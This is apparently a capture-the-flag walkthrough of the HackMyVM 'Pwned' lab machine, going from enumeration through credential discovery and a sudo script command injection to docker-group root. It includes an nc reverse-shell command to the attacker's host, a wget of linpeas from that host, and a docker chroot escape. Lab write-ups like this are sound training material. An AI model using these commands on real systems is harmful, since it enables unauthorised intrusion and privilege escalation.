Overview
| Box Difficulty | Link |
|---|---|
| Easy | hackmyvm Link |
Found this new site for vulnerable machines. For this box I downloaded it off hackmyvm and gave it a spin.
It's been a while, but I'm treating this as a practice session to warm my hands up.
Recon
Objective: find all the open ports and run an nmap service scan. I recently found out about rustscan and decided to give it a try.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# rustscan -a 192.168.56.19
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.19:21
Open 192.168.56.19:22
Open 192.168.56.19:80
```
We can see that there are 3 open ports: 21, 22 and 80.
The nmap service scan on those ports shows the following:
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nmap -sV -sC -p 21,22,80 192.168.56.19 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 05:18 EST
Nmap scan report for 192.168.56.19
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A1:7E:A2 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
```
Let’s enumerate!
FTP - TCP 21
The banner shows vsFTPd 3.0.3. Anonymous login is denied and searchsploit only lists a denial of service for this version, so there's nothing to work on here yet.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 (vsFTPd 3.0.3)
Name (192.168.56.19:kali):
530 Permission denied.
ftp: Login failed
ftp> exit
221 Goodbye.
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# searchsploit vsftpd
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
---------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
HTTP - TCP 80
Looking through the nikto output we can see that there's a robots.txt file which contains the entry /nothing.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nikto -ask=no -h 192.168.56.19:80 2>&1 | tee nikto_P80.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.19
+ Target Hostname: 192.168.56.19
+ Target Port: 80
+ Start Time: 2021-12-22 05:18:51 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /nothing/: Directory indexing found.
+ Entry '/nothing/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2021-12-22 05:19:09 (GMT-5) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Further enumeration leads to another dead end:
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# curl 192.168.56.19/nothing/nothing.html
<!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>
<h1>i said nothing bro </h1>
<p></p>
<!--I said nothing here. you are wasting your time i don't lie-->
</body>
```
The gobuster output has an interesting folder called /hidden_text.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# gobuster dir -u http://192.168.56.19:80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,php.bak,bak,jsp " -o gobuster_p80.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.19:80
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,jsp,txt,html,php,php.bak
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/22 05:20:37 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.19:80/index.html (Status: 200) [Size: 3065]
http://192.168.56.19:80/robots.txt (Status: 200) [Size: 41]
http://192.168.56.19:80/nothing (Status: 301) [Size: 316] [--> http://192.168.56.19/nothing/]
http://192.168.56.19:80/server-status (Status: 403) [Size: 278]
http://192.168.56.19:80/hidden_text (Status: 301) [Size: 320] [--> http://192.168.56.19/hidden_text/]
===============================================================
2021/12/22 05:23:32 Finished
===============================================================
```
Inside it there's a wordlist left for us called secret.dic. Let's save the file (with the leading slashes stripped, so gobuster can use it as a wordlist) and run gobuster again to see what we can find.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# curl http://192.168.56.19/hidden_text/secret.dic >> files.txt
/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat files.txt
hacked
vanakam_nanba
hackerman.gif
facebook
whatsapp
instagram
pwned
pwned.com
pubg
cod
fortnite
youtube
kali.org
hacked.vuln
users.vuln
passwd.vuln
pwned.vuln
backup.vuln
.ssh
root
home
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# gobuster dir -u http://192.168.56.19:80 -w files.txt -t 100 -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,php.bak,bak,jsp "
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.19:80
[+] Method: GET
[+] Threads: 100
[+] Wordlist: files.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,jsp,txt,html,php,php.bak
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/12/22 05:27:41 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.19:80/pwned.vuln (Status: 301) [Size: 319] [--> http://192.168.56.19/pwned.vuln/]
===============================================================
2021/12/22 05:27:41 Finished
===============================================================
```
Further enumeration of /pwned.vuln/ shows a username and password left in a commented-out PHP block in the page source! Great! Looks like we can reuse the password for FTP.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# curl http://192.168.56.19/pwned.vuln/
<!DOCTYPE html>
<html>
<head>
<title>login</title>
</head>
<body>
<div id="main">
<h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
<form method="POST">
Username <input type="text" name="username" class="text" autocomplete="off" required>
Password <input type="password" name="password" class="text" required>
<input type="submit" name="submit" id="sub">
</form>
</div>
</body>
</html>
<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>
```
Shell as ariana
Enumerating FTP for files and folders, we find an id_rsa private key used for SSH and also a note addressed to ariana.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ftp 192.168.56.19
Connected to 192.168.56.19.
220 (vsFTPd 3.0.3)
Name (192.168.56.19:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47890|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39232|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||13929|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |*****************************************************************************************************************************| 2602 5.35 MiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (3.12 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||46351|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |*****************************************************************************************************************************| 75 170.72 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (97.78 KiB/s)
```
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAthncqHSPVcE7xs136G/G7duiV6wULU+1Y906aF3ltGpht/sXByPB
aEzxOfqRXlQfkk7hpSYk8FCAibxddTGkd5YpcSH7U145sc2n7jwv0swjMu1ml+B5Vra7JJ
```
Let’s SSH into the server as ariana.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ssh ariana@192.168.56.19 -i id_rsa
The authenticity of host '192.168.56.19 (192.168.56.19)' can't be established.
ED25519 key fingerprint is SHA256:Eu7UdscPxuaxyzophLkeILniUaKCge0R96HjWhAmpyk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.19' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
ariana@192.168.56.19's password:
```
Looks like the permissions on the key file are too open: SSH refuses to use a private key that is readable by other users, so we restrict it to the owner first.
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# ssh ariana@192.168.56.19 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ whoami
ariana
```
Awesome, we got in!
Shell as selena
A sudo configuration might allow a user to execute some command as another user without knowing that user's password. In this case we can see that /home/messenger.sh can be executed as selena without a password. Looking through the file, it is a simple bash script, and the line `$msg 2> /dev/null` expands our input unquoted and runs it as a command, so whatever we type as the "message" is executed as selena.
```
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
ariana@pwned:/home$ ls -la /home/messenger.sh
-rwxr-xr-x 1 root root 367 Jul 10 2020 /home/messenger.sh
ariana@pwned:/home$ cat messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
```
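As an added example (not the box's own messenger.sh), here is the script's vulnerable pattern next to a hardened version that only ever treats the message as data; the function names and the spool directory are assumptions made for illustration:

```shell
#!/bin/sh
# Added example, not the box's /home/messenger.sh. Function names and the
# spool directory are assumptions for illustration.

# Vulnerable: the same thing messenger.sh does. The unquoted expansion of $msg
# is word-split and its first word runs as a command with the rest as arguments.
# Under "sudo -u selena" that command runs as selena, whatever the user typed.
send_message_vulnerable() {
    msg="$1"
    $msg 2> /dev/null
}

# Hardened: the recipient must be a plain lowercase username (non-empty, no
# leading dash, no path or shell characters) and the message text is appended
# with printf '%s', which never interprets or executes its argument.
send_message_hardened() {
    name="$1"
    msg="$2"
    spool="${3:-/var/spool/linux.messenger}"   # assumed spool directory
    case "$name" in
        ""|-*|*[!a-z0-9_-]*) return 2 ;;       # reject anything that is not a username
    esac
    [ -d "$spool" ] || return 1
    printf '%s\n' "$msg" >> "$spool/$name.msg" || return 1
    return 0
}

# Set MESSENGER_DEMO=1 to see the same input executed by one and stored by the other.
if [ "${MESSENGER_DEMO:-0}" = 1 ]; then
    send_message_vulnerable "id -un"
    d=$(mktemp -d)
    send_message_hardened selena "id -un" "$d" && cat "$d/selena.msg"
    rm -rf "$d"
fi
```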
Let's test whether this is true.
```
ariana@pwned:/home$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : test
Enter message for test :ls -la
Sending message to test
total 24
drwxr-xr-x 5 root root 4096 Jul 10 2020 .
drwxr-xr-x 18 root root 4096 Jul 6 2020 ..
drwxrwx--- 4 ariana ariana 4096 Jul 10 2020 ariana
drwxrwxrwx 3 root root 4096 Jul 9 2020 ftpuser
-rwxr-xr-x 1 root root 367 Jul 10 2020 messenger.sh
drwxrwx--- 3 selena root 4096 Jul 10 2020 selena
Message sent to test :)
```
Great, we can see that the command `ls -la` is executed. Let's run an nc command to get back a reverse shell as selena.
```
ariana@pwned:~$
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : test
Enter message for test :nc -e /bin/sh 192.168.56.3 4242
Sending message to test
```
Catch the reverse shell:
```
┌──(root💀kali)-[/opt/hackmyv/pwned]
└─# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.19]
whoami
selena
python3 -c 'import pty; pty.spawn("/bin/sh")'
$ whoami
whoami
selena
```
We are now selena!
Shell as Root
This time I'll use linpeas to enumerate.
```
$ cd /tmp
cd /tmp
$ wget http://192.168.56.3:1235/linpeas.sh
wget http://192.168.56.3:1235/linpeas.sh
--2021-12-23 20:25:04-- http://192.168.56.3:1235/linpeas.sh
Connecting to 192.168.56.3:1235... connected.
HTTP request sent, awaiting response... 200 OK
Length: 330173 (322K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 322.43K --.-KB/s in 0.004s
2021-12-23 20:25:04 (89.7 MB/s) - ‘linpeas.sh’ saved [330173/330173]
```
After running linpeas, this stuck out to me.
```
$ bash linpeas.sh
bash linpeas.sh
........
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
```
We are in the docker group! Membership of the docker group is effectively root on the host, because the docker daemon runs as root and any member can ask it to start a container with the host's filesystem bind-mounted. If you are inside a docker container or you have access to a user in the docker group, you could try to escape and escalate privileges.
Sample commands:
```bash
#List images to use one
docker images
#Run the image mounting the host disk and chroot on it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash
```
So in turn it’ll be like this:
```
$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
privesc latest 09ae39f0f8fc 17 months ago 88.3MB
<none> <none> e13ad046d435 17 months ago 88.3MB
alpine latest a24bb4013296 19 months ago 5.57MB
debian wheezy 10fcec6d95c4 2 years ago 88.3MB
$ docker run -it -v /:/host/ privesc chroot /host/ bash
root@445c9d840e51:~# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
```
Rooted!